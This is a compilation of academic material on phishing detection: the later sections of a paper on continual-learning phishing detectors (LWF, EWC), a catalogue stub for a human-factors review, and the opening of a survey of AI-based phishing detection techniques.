In the LWF technique, we retrain the model on the new task and impose a penalty in the loss function that forces it to maintain performance on the old tasks (a task is defined as a set of input features and their corresponding targets used in the retraining of the model). Figure 7 shows two parts in the LWF model: (1) shared weights $\theta _s$ and (2) task-specific weights $\theta _o$ . The shared weights contain the combined knowledge for all tasks, while task-specific weights are added at runtime as the number of tasks increases. The LWF algorithm does not require data belonging to old tasks during CL. It is based on the intuition that by stabilizing the outputs of neurons belonging to old tasks on the new data, the model does not change the weights of the neurons essential for the old tasks.

Algorithm 1 explains a step-by-step process to retrain the model with a new task. Our base VNN model, i.e., $VNN(X_n, \theta _s, \theta _o)$ , is first trained on the 2018A dataset; then a task-specific layer $\theta _n$ is added for a new task such as 2018B. Before any retraining, it records the outputs $Y_o$ for the old task from the enhanced model. Then it trains the model to adjust the parameters to work well on old and new tasks using only the data belonging to the new task. It performs two main computations during retraining: (a) it forces the model to keep the old task loss $\mathcal{L}_{old}$ constant to make sure the model does not forget its current state for the old task, and (b) it reduces the loss $\mathcal{L}_{new}$ for the new task heads (detection nodes) that are added to the decision layer with randomly initialized weights $\theta _n$ . The network learns the new task and minimizes the loss for only the new task by using regularization $\mathcal {R}$ with stochastic gradient descent 47 . A new task head can be added when we observe a performance decrease in the base model, as shown in Fig. 7 . All task heads can be used in the final decision (using majority voting or a weighted decision), or only the latest task head can be used. In our experiments, we trained a VNN model on 2018A and then retrained this model for the subsequent datasets using new task heads. We observed that LWF sustains the detection performance better than TL. We used predictions from the latest task head to compute accuracy on each new task.
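The two loss terms can be sketched as a combined objective of the form $\mathcal{L} = \mathcal{L}_{new} + \lambda _o \mathcal{L}_{old}$ . This is a simplified illustration, not Algorithm 1 itself: it uses plain binary cross-entropy with the recorded outputs $Y_o$ as soft targets, whereas the original LWF formulation uses a temperature-softened distillation loss, and the weight `lambda_old` and all function names are assumptions.

```python
import math

def binary_cross_entropy(target, predicted, eps=1e-12):
    """BCE for one sample; the target may be a hard label or a soft output."""
    p = min(max(predicted, eps), 1.0 - eps)  # clamp to avoid log(0)
    return -(target * math.log(p) + (1.0 - target) * math.log(1.0 - p))

def lwf_loss(new_labels, new_head_probs,
             recorded_old_probs, old_head_probs, lambda_old=1.0):
    """New-task loss plus a penalty for drifting from recorded old outputs."""
    n = len(new_labels)
    loss_new = sum(binary_cross_entropy(y, p)
                   for y, p in zip(new_labels, new_head_probs)) / n
    loss_old = sum(binary_cross_entropy(y_o, p_o)
                   for y_o, p_o in zip(recorded_old_probs, old_head_probs)) / n
    return loss_new + lambda_old * loss_old

labels = [1, 0]            # ground truth for two new-task samples
new_probs = [0.8, 0.3]     # new head predictions
recorded = [0.9, 0.2]      # Y_o: old head outputs recorded before retraining

print(lwf_loss(labels, new_probs, recorded, recorded))    # no drift
print(lwf_loss(labels, new_probs, recorded, [0.5, 0.5]))  # old head drifted
```

The old-task term is smallest when the old head reproduces the recorded outputs, so gradient descent is discouraged from changing shared weights in ways that alter old-task behaviour, even though no old data is used.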

Figure 8 a–f shows the results of CL with LWF. We observed that LWF achieves high accuracy on each new dataset while maintaining performance on the previous datasets. As with TL, each of the six experiments represents the number of retraining rounds applied to the 2018A model; for example, experiment 3 in Fig. 8 c represents the results of the 2018A model after retraining on two new datasets. Figure 8 f shows that LWF achieves 93% on 2018A and 95% on the last task after retraining five times. This shows that the CL method is quite effective in coping with the forgetting problem on old tasks while learning new tasks.

LWF sustains test accuracy on the current and previous datasets after retraining.

Experiments with CL: elastic weight consolidation

Elastic Weight Consolidation (EWC) is another CL technique that is intuitive and effective in learning multiple tasks 34 . In EWC, we find the joint feature space between old and new tasks by adding a penalty to the loss function (Eq. ( 1 )) of the VNN. Figure 9 shows two tasks, A and B, for which a common feature space can be found during training. The penalty enforced during the training of task B encourages the model to change only those weights that are not used or have less importance for task A. Consequently, the model learns a common feature space representing both tasks. EWC computes the importance of the weights for task A by computing the Fisher information matrix F 34 before training task B. The penalty in the loss function uses the Fisher matrix, as shown in Eq. ( 1 ). The term $L_{B}(\theta )$ is the loss for task B, and $L(\theta )$ is the overall loss that is penalized with the F matrix. Minimizing the overall loss decreases the task B loss under a penalty, so that the model learns the common feature space between tasks A and B. We observed that it is difficult to maintain high performance on old tasks as the number of tasks increases, due to weight saturation.
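In the standard EWC formulation from the literature, which we assume corresponds to the loss described above, the overall loss is $L(\theta ) = L_{B}(\theta ) + \sum _i \frac{\lambda }{2} F_i (\theta _i - \theta ^{*}_{A,i})^2$ , where $\theta ^{*}_{A}$ are the weights after training task A, $F_i$ is the diagonal Fisher value for weight $i$ , and $\lambda$ controls how strongly old knowledge is protected. The sketch below evaluates this penalty on toy values; the function names and numbers are illustrative.

```python
def ewc_penalty(theta, theta_star_a, fisher_diag, lam=1.0):
    """Quadratic penalty that grows when important task-A weights move."""
    return 0.5 * lam * sum(
        f * (t - t_a) ** 2
        for t, t_a, f in zip(theta, theta_star_a, fisher_diag)
    )

def ewc_loss(task_b_loss, theta, theta_star_a, fisher_diag, lam=1.0):
    """Overall loss: task-B loss plus the Fisher-weighted penalty."""
    return task_b_loss + ewc_penalty(theta, theta_star_a, fisher_diag, lam)

theta_a = [1.0, 1.0]   # weights after training on task A
fisher = [10.0, 0.1]   # first weight matters for task A, second barely does

# Moving the important weight is penalized far more than the other one.
print(ewc_penalty([1.5, 1.0], theta_a, fisher))
print(ewc_penalty([1.0, 1.5], theta_a, fisher))
```

The same displacement costs a hundred times more on the weight with the larger Fisher value, which steers learning for task B toward weights that task A does not depend on.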

Elastic weight consolidation conceptual diagram.

Figure 10 a–f shows the EWC method results. It shows that EWC also learns well on the current dataset and preserves the knowledge from the previous training, thus maintaining overall better performance accuracy for all tasks. For example, Fig. 10 f shows that EWC achieves 93% accuracy on the 2018A dataset and achieves 95% on the 2020B dataset, which is quite close to LWF results.

EWC also sustains test accuracy on old tasks but achieves slightly less test accuracy on current tasks than LWF.

From the above four experiments, we observe that VNN performs well only on the current task, TL gives some performance improvement, and CL-based methods give promising results for all tasks as shown in Figs. 4 , 6 , 8 and 10 .

Performance comparison of continual learning

This section describes the overall comparison of CL techniques with VNN and TL-based methods. CL techniques are observed to be resilient and reliable for achieving lifelong high-performance detection of phishing attacks.

Accuracy comparison

Figure 11 shows the performance comparison of the best testing accuracies achieved with the six datasets and all four techniques. VNN is trained separately for each dataset, while the TL and CL models are retrained on each dataset. We see that VNN gives around 95% accuracy, whereas TL suffers a significant performance loss that grows as the number of retraining tasks increases. The CL techniques outperform the TL approach, and their accuracies are close to the VNN accuracy, which is considered the benchmark. Thus, CL-based algorithms give promising results for real-time model retraining.

Comparison of the best TL and CL accuracies with the benchmark accuracy of VNN on all historical datasets.

Confusion matrices

We compare confusion matrices for the best performance from all experiments to evaluate the VNN, TL, and CL techniques. A confusion matrix has four values: the first row contains the true positives (TP) and false negatives (FN) in the first and second columns, respectively, while the second row contains the false positives (FP) and true negatives (TN). In ML model evaluation, the TP value should be high, as it shows how well the model can identify malicious samples. Figure 12 shows confusion matrices for the VNN, TL, and CL techniques with experiments on the six datasets. VNN achieves a 97% TP score, which is the highest TP and the best result without any retraining. At the same time, LWF gives 94%, which is the best result for all datasets with retraining. It can also be seen from Fig. 12 that VNN has a higher true positive rate than the CL-based methods (LWF and EWC), which reflects a computation vs. accuracy trade-off: CL-based methods achieve good accuracy over time with little retraining, while VNN requires training from scratch on each dataset. The FN score represents phishing pages that the model has misclassified as benign, and we want it to be as low as possible in an ML system. Our analysis shows that the false-negative score is lowest overall with the EWC method, as evident from Fig. 12 .
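The rates discussed above follow directly from the four cells of the confusion matrix. The sketch below uses hypothetical counts, not values read from Fig. 12, to show how they are derived.

```python
def confusion_metrics(tp, fn, fp, tn):
    """Derive standard rates from the four confusion matrix cells."""
    total = tp + fn + fp + tn
    return {
        "accuracy": (tp + tn) / total,
        "tpr": tp / (tp + fn),        # phishing pages correctly detected
        "fnr": fn / (tp + fn),        # phishing pages missed
        "fpr": fp / (fp + tn),        # benign pages wrongly flagged
        "precision": tp / (tp + fp),  # flagged pages that are phishing
    }

# Hypothetical counts for 100 phishing and 100 benign test pages.
metrics = confusion_metrics(tp=94, fn=6, fp=5, tn=95)
for name, value in metrics.items():
    print(f"{name}: {value:.3f}")
```

Since the true positive rate and the false negative rate sum to one, a model with a higher TP score necessarily misses fewer phishing pages.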

Confusion matrices comparison for best experiments from VNN, TL, and CL-based methods shows CL methods are close to VNN after retraining.

Discussions

This study investigates the issue of performance drop over time in ML models by retraining the trained model on only new data. To conduct our experiments, we consider two CL-based methods, i.e., EWC and LWF. These methods have relatively low computation and memory costs and require less training data and retraining time than other TL methods, e.g., DA and PNNs, etc. However, CL-based methods have several restrictions, e.g., (i) the size of learnable parameters increases as a new task is added for learning, (ii) catastrophic forgetting may happen after several training attempts by adding new data, and (iii) data bias, where CL model becomes biased for the specific task 48 , 49 .

Our experiments showed that when the CL model was trained successively on the six datasets, it achieved satisfactory results comparable with VNN, even with little retraining on only new data. However, we observed a slight decrease in the true positive rate for CL-based methods because the CL model is trained on new data and may forget previously learned data (catastrophic forgetting). It therefore performs slightly worse than VNN, which is a computation vs. accuracy trade-off. To the best of our knowledge, previous studies have used only one or more independent datasets to train and evaluate their ML-based methods for phishing detection. We did not use the datasets from previous studies because they do not contain multiple years of data, which is needed to demonstrate the idea of CL in phishing detection. We therefore collected our own datasets for three consecutive years, presented results for existing ML-based phishing detection methods such as the vanilla neural network and TL, and compared them with CL to show the life-long phishing detection performance.

Conclusion and future work

In this study, we identified the performance drop of traditional ML models over time. To study this issue, we conducted several experiments under three different settings: a VNN model without retraining, a VNN model with TL, and a VNN model with CL. Our experimental results show that VNN models have high detection accuracy when a separate model is trained every time for each new dataset with a different distribution. This requires training resources such as extensive training data and training time. We want to retain previous knowledge of phishing tactics and adapt it to new attacks. For this reason, we experimented with the TL-based model, and its accuracy deteriorated over time when it was retrained with new data samples. CL algorithms are the least affected by these changing data distributions, owing to an efficient retraining mechanism that adapts to new knowledge quickly while maintaining previously learned knowledge. Therefore, CL-based algorithms can be practically used as a first-stage phishing attack detection mechanism in a real-time environment with promising long-term results. CL-based algorithms have practical applications in reducing false positives, improving efficiency, and forming part of an overall phishing defense strategy.

In the future, further investigations can be performed to reduce catastrophic forgetting. As new phishing techniques are introduced, new tasks will be added, which will eventually increase the model’s complexity. This requires much retraining in hyperparameter optimization and finding the best possible set of parameters and model size, which can also be considered as future work. We also aim to explore the various embedding models, like BERT, etc., to extract more powerful features for phishing detection. We consider investigating other continual learning techniques, e.g., replay-based methods, task-specific learning, etc., in phishing detection as future work. Finally, we also consider the adversarial training of the CL-based models in the future.

Data availability

The dataset generated and analyzed during the current study of phishing attack detection is available in the Kaggle Datasets repository: https://www.kaggle.com/datasets/asifejazitu/phishing-dataset .

APWG. Apwg | phishing activity trends reports. Apwg.org. https://apwg.org (2022).

Tian, K., Jan, S. T., Hu, H., Yao, D. & Wang, G. Needle in a haystack: Tracking down elite phishing domains in the wild. In: Proceedings of the Internet Measurement Conference 2018 , 429–442 (2018).

Gupta, B. B., Tewari, A., Jain, A. K. & Agrawal, D. P. Fighting against phishing attacks: State of the art and future challenges. Neural Comput. Appl. 28 , 3629–3654 (2017).

Jain, A. K. & Gupta, B. B. A machine learning based approach for phishing detection using hyperlinks information. J. Ambient. Intell. Humaniz. Comput. 10 , 2015–2028 (2019).

Zhang, W., Jiang, Q., Chen, L. & Li, C. Two-stage ELM for phishing web pages detection using hybrid features. World Wide Web 20 , 797–813 (2017).

Peng, T., Harris, I. & Sawa, Y. Detecting phishing attacks using natural language processing and machine learning. In: 2018 IEEE 12th International Conference on Semantic Computing (ICSC) , 300–301 (IEEE, 2018).

Shirazi, H., Haefner, K. & Ray, I. Fresh-phish: A framework for auto-detection of phishing websites. In: 2017 IEEE International Conference on Information Reuse and Integration (IRI) , 137–143 (IEEE, 2017).

Corona, I. et al. Deltaphish: Detecting phishing webpages in compromised websites. In: European Symposium on Research in Computer Security , 370–388 (Springer, 2017).

Tyagi, I., Shad, J., Sharma, S., Gaur, S. & Kaur, G. A novel machine learning approach to detect phishing websites. In: 2018 5th International Conference on Signal Processing and Integrated Networks (SPIN) , 425–430 (IEEE, 2018).

Shirazi, H., Bezawada, B. & Ray, I. “kn0w thy doma1n name” unbiased phishing detection using domain name based features. In: Proceedings of the 23nd ACM on Symposium on Access Control Models and Technologies , 69–75 (2018).

Smadi, S., Aslam, N. & Zhang, L. Detection of online phishing email using dynamic evolving neural network based on reinforcement learning. Decis. Support Syst. 107 , 88–102 (2018).

Rao, R. S. & Pais, A. R. Detection of phishing websites using an efficient feature-based machine learning framework. Neural Comput. Appl. 31 , 3851–3873 (2019).

Jain, A. K. & Gupta, B. B. Towards detection of phishing websites on client-side using machine learning based approach. Telecommun. Syst. 68 , 687–700 (2018).

Xiao, X. et al. Phishing websites detection via CNN and multi-head self-attention on imbalanced datasets. Comput. Secur. 108 , 102372 (2021).

Wei, B. et al. A deep-learning-driven light-weight phishing detection sensor, MDPI Sensors. 19 (19), 4258 (2019).

Article ADS PubMed PubMed Central Google Scholar

Patil, S. & Dhage, S. A methodical overview on phishing detection along with an organized way to construct an anti-phishing framework, In 2019 5th International Conference on Advanced Computing & Communication Systems (ICACCS) , 588–593 (IEEE, 2019).

Adebowale, M. A., Lwin, K. T. & Hossain, M. A. Intelligent phishing detection scheme using deep learning algorithms, J. Enterp. Inf. Manag. (2020).

Aljofey, A., Jiang, Q., Qu, Q., Huang, M. & Niyigena, J.-P. An effective phishing detection model based on character level convolutional neural network from URL. Electronics 9 , 1514 (2020).

Sahingoz, O. K., Buber, E., Demir, O. & Diri, B. Machine learning based phishing detection from URLs, Expert Syst. Appl. 117 , 345–357 (2019).

Ubing, A. A., Jasmi, S. K. B., Abdullah, A., Jhanjhi, N. & Supramaniam, M. Phishing website detection: An improved accuracy through feature selection and ensemble learning Int. J. Adv. Comput. Sci. Appl., 10 (2019).

Zamir, A. et al. Phishing web site detection using diverse machine learning algorithms. Electron. Libr. 38 , 65–80 (2020).

Article ADS Google Scholar

Niakanlahiji, A., Chu, B.-T. & Al-Shaer, E. Phishmon: A machine learning framework for detecting phishing webpages. In 2018 IEEE International Conference on Intelligence and Security Informatics (ISI) , 220–225 (IEEE, 2018).

Alhogail, A. & Alsabih, A. Applying machine learning and natural language processing to detect phishing email, Comput. Secur. 110 , 102414 (2021).

Yi, P., Guan, Y., Zou, F., Yao, Y., Wang, W. & Zhu, T. Web phishing detection using a deep learning framework. Wireless Communications and Mobile Computing (2018).

Aljofey, A. et al. An effective detection approach for phishing websites using URL and HTML features. Sci. Rep. 12 , 1–19 (2022).

Zheng, F., Yan, Q., Leung, V. C., Yu, F. R. & Ming, Z. HDP-CNN: Highway deep pyramid convolution neural network combining word-level and character-level representations for phishing website detection. Comput. Secur. 114 , 102584 (2022).

Liu, D.-J., Geng, G.-G., Jin, X.-B. & Wang, W. An efficient multistage phishing website detection model based on the case feature framework: Aiming at the real web environment. Comput. Secur. 110 , 102421 (2021).

Tan, C.L., Chiew, K.L., Yong, K.S., Abdullah, J. and Sebastian, Y. A graph-theoretic approach for the detection of phishing webpages, Comput. Secur. 95 , 101793 (2020).

Chiew, K. L., Tan, C. L., Wong, K., Yong, K. S. & Tiong, W. K, A new hybrid ensemble feature selection framework for machine learning-based phishing detection system. Inf. Sci. 484 , 153–166 (2019).

Chiew, K. L., Chang, E. H., & Tiong, W. K. Utilisation of website logo for phishing detection. Comput. Secur. , 54 , 16–26 (2015).

Barraclough, P. A., Fehringer, G. & Woodward, J. Intelligent cyber-phishing detection for online Comput. Secur. 104 , 102123 (2021).

Adebowale, M. A., Lwin, K. T., Sanchez, E. & Hossain, M. A. Intelligent web-phishing detection and protection scheme using integrated features of images, frames and text. Expert Syst. Appl. 115 , 300–313 (2019).

Li, Z. & Hoiem, D. Learning without forgetting. IEEE Trans. Pattern Anal. Mach. Intell. 40 , 2935–2947 (2017).

Article PubMed Google Scholar

Kirkpatrick, J. et al. Overcoming catastrophic forgetting in neural networks, In: Proceedings of the national academy of sciences , 114 (13), 3521–3526 (2017).

Article ADS MathSciNet CAS PubMed PubMed Central MATH Google Scholar

Mikolov, T., Chen, K., Corrado, G. & Dean, J. Efficient estimation of word representations in vector space, arXiv preprint arXiv:1301.3781 (2013).

Pennington, J., Socher, R. & Manning, C. D. Glove: Global vectors for word representation, In: Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP) , pp. 1532–1543 (2014).

Bojanowski, P., Grave, E., Joulin, A. & Mikolov, T. Enriching word vectors with subword information. Transact. Assoc. Comput. linguist. 5 , 135–146 (2017).

Devlin, J., Chang, M.-W., Lee, K. & Toutanova, K. BERT: Pre-training of deep bidirectional transformers for language understanding. arXiv preprint arXiv:1810.04805 (2018).

Cer, D. et al. Universal sentence encoder, arXiv preprint arXiv:1803.11175 (2018).

Zhuang, F. et al. A comprehensive survey on transfer learning, In: Proceedings of the IEEE , 109 (1), 43–76 (2020).

De Lange, M. et al. A continual learning survey: Defying forgetting in classification tasks. IEEE Trans. Pattern Anal. Mach. Intell. , 44 (7), 3366–3385 (2021).

Google Scholar

Yu, T., Kumar, S., Gupta, A., Levine, S., Hausman, K., & Finn, C., Gradient surgery for multi-task learning. Adv. Neural. Inf. Process. Syst. 33 , 5824–5836 (2020).

Rusu, A.A. et sl. Progressive neural networks. Neural Information Processing Systems (2016).

Wang, M. & Deng, W., Deep visual domain adaptation: A survey. Neurocomputing 312 , 135–153 (2018).

VirusTotal. Virustotal: A community platform for reporting malicious payloads. https://www.virustotal.com/gui/home/upload (2022).

PhishTank: A community platform for reporting phishing websites. https://phishtank.org/ (2022).

Andrychowicz, M. et al. Learning to learn by gradient descent by gradient descent, Advances in Neural Information Processing Systems 29 (2016).

Mirzadeh, S.I., Farajtabar, M., Pascanu, R. and Ghasemzadeh, H., Understanding the role of training regimes in continual learning. Advances in Neural Information Processing Systems. 33 , 7308–7320 (2020).

Kemker, R., McClure, M., Abitino, A., Hayes, T. & Kanan, C, Measuring catastrophic forgetting in neural networks. In Proceedings of the AAAI Conference on Artificial Intelligence 32 (2018).

Download references

Author information

Authors and affiliations.

Department of Computer Science, Information Technology University, Lahore, 54000, Pakistan

Asif Ejaz, Adnan Noor Mian & Sanaullah Manzoor

Contributions

Proposal, A.E.; Data acquisition, A.E.; Investigation, A.E.; Methodology, A.E.; Experiments, A.E.; Supervision, A.N.; Validation, S.M. and A.N.; Writing-original draft, A.E.; Writing-review & editing, S.M. and A.N. All authors reviewed the manuscript.

Corresponding author

Correspondence to Adnan Noor Mian .

Ethics declarations

Competing interests.

The authors declare no competing interests.

Additional information

Publisher's note.

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Rights and permissions

Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article’s Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article’s Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/ .

About this article

Cite this article.

Ejaz, A., Mian, A.N. & Manzoor, S. Life-long phishing attack detection using continual learning. Sci Rep 13 , 11488 (2023). https://doi.org/10.1038/s41598-023-37552-9

Received : 31 December 2022

Accepted : 23 June 2023

Published : 17 July 2023

DOI : https://doi.org/10.1038/s41598-023-37552-9

Human Factors in Phishing Attacks: A Systematic Literature Review

Index Terms

Human-centered computing

Human computer interaction (HCI)

Security and privacy

Human and societal aspects of security and privacy

Intrusion/anomaly detection and malware mitigation

Social engineering attacks

Information

Published in.

University of Sydney, Australia

Association for Computing Machinery

New York, NY, United States

Author tags

human factors
cybersecurity

Funding Sources

Italian Ministry of University and Research (MUR)
PON projects LIFT, TALIsMAn, and SIMPLe
“Dipartimento di Eccellenza”
DATACLOUD, DESTINI, and FIRST
RoMA—Resilience of Metropolitan Areas

A comprehensive survey of AI-enabled phishing attacks detection techniques

Abdul Basit

1 Department of Computer Science, Air University, E-9, Islamabad, Pakistan

Maham Zafar

2 School of Information Engineering, Yangzhou University, Yangzhou, China

Abdul Rehman Javed

3 Department of Cyber Security, Air University, E-9, Islamabad, Pakistan

Zunera Jalil

Kashif Kifayat

In recent times, phishing has become one of the most prominent attacks faced by internet users, governments, and service-providing organizations. In a phishing attack, the attacker(s) collect the client’s sensitive data (i.e., user account login details, credit/debit card numbers, etc.) by using spoofed emails or fake websites. Phishing websites are common entry points for online social engineering attacks, including numerous web-based frauds. In such attacks, the attacker(s) create web pages that copy the behavior of legitimate websites and send URL(s) to the targeted victims through spam messages, texts, or social networking. To provide a thorough understanding of phishing attacks, this paper provides a literature review of Artificial Intelligence (AI) techniques for phishing attack detection: Machine Learning, Deep Learning, Hybrid Learning, and Scenario-based techniques. This paper also compares the studies that detect phishing attacks with each AI technique and examines the strengths and shortcomings of these methodologies. Furthermore, this paper provides a comprehensive set of current challenges of phishing attacks and future research directions in this domain.

Introduction

The process of protecting cyberspace from attacks has come to be known as Cyber Security [ 16 , 32 , 37 ]. Cyber Security is about protecting internet-connected resources from cyber-attacks, preventing such attacks, and recovering from them [ 20 , 38 , 47 ]. The complexity of the cybersecurity domain increases daily, which makes identifying, analyzing, and controlling the relevant risk events a significant challenge. Cyberattacks are malicious digital attempts to steal, damage, or intrude into personal or organizational confidential data [ 2 ]. A phishing attack uses fake websites to obtain sensitive client data, for example, account login credentials, credit card numbers, etc. In 2018, the Anti-Phishing Working Group (APWG) reported more than 51,401 unique phishing websites. Another report, by RSA, estimated that organizations worldwide suffered losses amounting to $9 billion due to phishing attacks in 2016 [ 26 ]. These statistics demonstrate that current anti-phishing techniques and efforts are not effective. Figure 1 shows how a typical phishing attack happens.

Fig. 1 Phishing attack diagram [ 26 ]

Personal computer users fall victim to phishing attacks for five primary reasons [ 60 ]: (1) users lack detailed knowledge of Uniform Resource Locators (URLs), (2) they do not know exactly which pages can be trusted, (3) they cannot see the full location of a page because of redirection or hidden URLs, (4) a URL can take many possible forms, or some pages are entered accidentally, and (5) users cannot differentiate a phishing web page from a legitimate one.

Phishing websites are common entry points for online social engineering attacks, including numerous ongoing web scams [ 30 ]. In such attacks, the attackers create web pages by copying genuine websites and send suspicious URLs to the targeted victims through spam messages, texts, or online social networking. An attacker distributes a fake version of an original website through email, phone, or text messages [ 5 ], expecting that the targeted victims will accept the claims made in the message. The attacker aims to get the victim to enter personal or highly sensitive data (e.g., bank details, government savings number, etc.). A successful phishing attack results in the attacker acquiring bank card information and login data. There are, however, several methods to combat phishing [ 27 ]. The expanded use of Artificial Intelligence (AI) has affected essentially every industry, including cyber-security. In email security, AI has brought speed, accuracy, and the capacity for detailed investigation. AI can detect spam, phishing, spear phishing, and other kinds of attacks by using previous knowledge in the form of datasets. These types of attacks are likely to have a negative impact on clients’ trust in social services such as web services. According to the APWG report, 1,220,523 phishing attacks were reported in 2016, a 65% increase over 2015 [ 1 ]. Figure 2 shows the Phishing Report for the third quarter of 2019.

Fig. 2 Phishing report for the third quarter of 2019 [ 1 ]

As per Parekh et al. [ 51 ], a generic phishing attack has four stages. First, the phisher creates and sets up a fake website that looks like an authentic website. Second, the phisher sends a URL link to the website to a targeted victim while pretending to be a genuine organization, user, or association. Third, the victim is tempted to visit the fake website. Fourth, the victim clicks on the fake link and enters his/her valuable data. Using the victim’s personal data, the phisher then performs impersonation activities. APWG contributes individual reports on phishing URLs and analyzes the continually evolving nature and techniques of cybercrime. The Anti-Phishing Working Group (APWG) tracks the number of unique phishing websites, a primary measure of phishing across the globe. Phishing sites are determined by their unique base URLs. The total number of phishing websites detected by APWG in the 3rd quarter of 2019 was 266,387 [ 3 ]. This was up 46% from the 182,465 seen in Q2 and almost double the 138,328 seen in Q4 2018.
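The quarter-over-quarter comparison quoted above can be checked with a few lines of arithmetic. The sketch below uses only the three counts given in the text; the variable and function names are illustrative and do not come from the APWG report.

```python
# Counts of unique phishing websites, as quoted in the paragraph above.
q4_2018 = 138_328
q2_2019 = 182_465
q3_2019 = 266_387


def percent_change(old: int, new: int) -> float:
    """Return the relative change from old to new, in percent."""
    return (new - old) / old * 100.0


# Growth from Q2 2019 to Q3 2019, and the ratio of Q3 2019 to Q4 2018.
growth_vs_q2 = percent_change(q2_2019, q3_2019)
ratio_vs_q4_2018 = q3_2019 / q4_2018

print(f"Q2 -> Q3 2019: {growth_vs_q2:.1f}% increase")
print(f"Q3 2019 relative to Q4 2018: {ratio_vs_q4_2018:.2f}x")
```

The computed growth rounds to 46%, and the ratio against Q4 2018 is a little under two, which matches the "practically twofold" wording.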

Figure 3 shows the most targeted industries in 2019. Attacks on cloud storage and file hosting websites and on financial institutions remained more frequent, while attacks on the gaming, insurance, energy, government, and healthcare sectors were less prominent during the 3rd quarter [ 3 ].

Fig. 3 Most targeted industry sectors, 3rd quarter 2019 [ 3 ]

MarkMonitor is an online brand protection company that secures intellectual property. In the 3rd quarter of 2019, the most frequent targets of phishing remained Software as a Service (SaaS) and webmail websites. Phishers continue to harvest credentials for these kinds of websites, using them to carry out business email compromise (BEC) and to break into corporate SaaS accounts.

This survey covers four aspects of a phishing attack: communication media, target devices, attack techniques, and counter-measures, as shown in Fig. 4 . Communication media are the channels through which a human interacts with the application targeted by the attack. Seven types of communication media are identified from the literature: Email, Messenger, Blog & Forum, Voice over Internet Protocol (VoIP), Website, Online Social Network (OSN), and Mobile platform. Target devices play a significant role in the selection of attack strategies, as victims interact online through physical devices. A phishing attack may target personal computers, smart devices, voice devices, and/or WiFi-smart devices, which include VoIP devices as well as mobile phones.

Fig. 4 Taxonomy of this survey focusing on phishing attack detection studies

Attack techniques are grouped into two categories: attack launching and data collection. For attack launching, several techniques are identified, such as email spoofing, attachments, abusing social settings, URL spoofing, website spoofing, interactive voice response, collaboration in a social network, reverse social engineering, man-in-the-middle attack, spear phishing, spoofed mobile internet browser, and installed web content. For data collection during and after the victim’s interaction with the attack, various techniques are used [ 49 ]. These are of two types: automated data collection techniques (such as fake website forms, key loggers, and recorded messages) and manual data collection techniques (such as human misdirection and social networking). Then, there are counter-measures, which concern the victim’s data collected or used before and after the attack and are used to detect and prevent attacks. We categorize counter-measures into four groups: (1) Deep learning-based techniques, (2) Machine learning techniques, (3) Scenario-based techniques, and (4) Hybrid techniques.

To the best of our knowledge, the existing literature [ 11 , 18 , 28 , 40 , 62 ] includes a limited number of surveys, which focus mainly on providing an overview of attack detection techniques. These surveys do not cover all deep learning, machine learning, hybrid, and scenario-based techniques in detail. Moreover, they lack an extensive discussion of current and future challenges for phishing attack detection.

In view of the above limitations, this article makes the following contributions:

Provide a comprehensive and easy-to-follow survey focusing on deep learning, machine learning, hybrid learning, and scenario-based techniques for phishing attack detection.
Provide an extensive discussion on various phishing attack techniques and comparison of results reported by various studies.
Provide an overview of current practices, challenges, and future research directions for phishing attack detection.

The study is organized into the following sections: Sect. 1 presents the introduction to phishing attacks. Section 2 presents the literature survey focusing on deep learning, machine learning, hybrid learning, and scenario-based phishing attack detection techniques and compares these techniques. Section 3 presents a discussion of the various approaches used in the literature. Section 4 presents the current and future challenges. Section 5 concludes the paper with recommendations for future research.

Literature survey

This paper explores the detailed literature available in prominent journals, conferences, and chapters, drawing on relevant articles from Springer, IEEE, Elsevier, Wiley, Taylor & Francis, and other well-known publishers. This literature review was formulated after an exhaustive search of the literature published in the last 10 years.

A phishing attack is one of the most serious threats to any organization. In this section, we present the work done on phishing attacks in more depth, along with its different types. Initially, phishing attacks were performed on telephone networks, a practice known as Phone Phreaking, which is why the term “fishing” was replaced with “phishing”, with ph replacing f. From the reports of the Anti-Phishing Working Group (APWG) [ 1 ], it can be confirmed that phishing was discovered in 1996, when America Online (AOL) accounts were attacked through social engineering. Phishing has become a danger to many people, especially those who are unaware of the dangers of the internet. According to a report by the Federal Bureau of Investigation (FBI) [ 4 ], from October 2013 to February 2016, phishing attacks caused damage of 2.3 billion dollars. In general, users tend to overlook the URL of a website. Phishing scams carried out through phishing websites can often be prevented by checking whether a URL belongs to a phishing or an authentic website. When a website is suspected of being a phish, the user can escape the criminal’s trap.
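To make the idea of inspecting a URL concrete, the following minimal sketch extracts a few lexical cues from a URL using only the Python standard library. The chosen cues (an IP address as host, an "@" in the URL, missing HTTPS, and so on) are illustrative assumptions, not features taken from the surveyed studies, and none of them is sufficient on its own to label a URL as phishing. The function name `url_features` is hypothetical.

```python
import ipaddress
from urllib.parse import urlsplit


def url_features(url: str) -> dict:
    """Extract simple lexical cues from a URL (illustrative, not exhaustive)."""
    parts = urlsplit(url)
    host = parts.hostname or ""

    # A raw IP address in place of a domain name is a common warning sign.
    try:
        ipaddress.ip_address(host)
        host_is_ip = True
    except ValueError:
        host_is_ip = False

    return {
        "length": len(url),
        "uses_https": parts.scheme == "https",
        "host_is_ip": host_is_ip,
        # Text before "@" in the authority part is user info, not the host,
        # so "http://example.com@192.0.2.10/" actually points at 192.0.2.10.
        "has_at_symbol": "@" in url,
        "num_host_labels": len(host.split(".")) if host else 0,
        "has_hyphen_in_host": "-" in host,
    }


suspicious = url_features("http://example.com@192.0.2.10/login")
ordinary = url_features("https://www.example.com/")
print(suspicious)
print(ordinary)
```

In a detection pipeline, such cues would typically serve as input features to a classifier rather than as a verdict by themselves.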

The conventional approaches to phishing attack detection give low accuracy and can recognize only about 20% of phishing attacks. Machine learning approaches give good results for phishing detection but are time-consuming even on small datasets and are not scalable. Phishing detection by heuristic techniques gives high false-positive rates. User awareness is an important factor in defending against phishing attacks. Phishers use fake URLs to capture the confidential private data of the targeted victim, such as bank account data, personal data, usernames, passwords, etc.

